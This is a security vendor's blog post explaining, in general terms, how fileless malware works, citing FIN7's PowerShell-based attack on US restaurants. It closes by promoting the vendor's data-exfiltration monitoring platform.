Fileless malware is rapidly gaining popularity. Once a cyberwarfare technique used mostly by state-level actors, fileless malware has percolated into the hands of more common criminals. A recent large-scale cyberattack against US restaurants proves that fileless malware attacks are the newest threat that administrators need to worry about. Here's how it works—and how to stop it.
What's the Deal with Fileless Malware Attacks?
In the normal course of events, a virus loads malware into a computer's hard drive, where it sits in a hidden folder, takes over processes, and attempts to exfiltrate data to an external bad actor. Fileless malware doesn't work this way. Instead of loading malicious programs into a computer's hard drive, fileless malware attacks memory—a computer's RAM.
To be clear, the initial infection phase of fileless malware does involve a file. Typically, this will take the form of a Word document or textfile. The intended victim opens the file and turns off "protected view." This is actually the hardest part of the attack, as Windows strongly recommends against turning off protected view for any downloaded files. Still, convincing users to ignore a safety warning has never been outstandingly difficult.
With the safeguards thus removed, the malware is free to do its work. Every form of fileless malware isn't the same, of course, but the malware used in the most recent attack on US restaurants is typical of the norm. The malware, created by a group known as FIN7, first creates two files which are split in half. The first file creates a piece of Windows code that executes the second. The second file is what finally begins creating the fileless processes using Powershell.
Powershell is the Key to Many Fileless Malware Examples
Although the initial form of the FIN7 malware uses a Microsoft Word exploit, it doesn't have to. The key for FIN7 is that second file it creates, which begins executing processes using a tool known as PowerShell. PowerShell is an extremely important tool for fileless malware, because it can create and run scripts directly in memory.
PowerShell is typically used by administrators to perform tasks remotely on Windows systems. In order to accomplish its legitimate purpose, it must bypass policies that would ordinarily forbid admins from executing code remotely. Attackers can use this same feature to execute code in memory, completely evading endpoint security that usually just scans hard drives. Because of this, nearly 20% of all attacks that affect the endpoint now begin as in-memory attacks.
How Can Administrators Mitigate Fileless Malware?
Fileless malware isn't necessarily a world-ending threat, and its name is a bit of a misnomer (as the initial infection still involves files). Still, administrators definitely need to be cautious and prepared—otherwise the malware infection will go right by your pre-existing endpoint protection solution.
If this happens, your only defense is going to be your ability to monitor the data that's coming out of your network. That's where Safe-T comes in. The Safe-T Integrated Data Security Platform can monitor all common enterprise file transfer protocols and determine whether customer data is leaving anywhere it shouldn't. For more information, check out our white paper on the Next Generation Security Perimeter.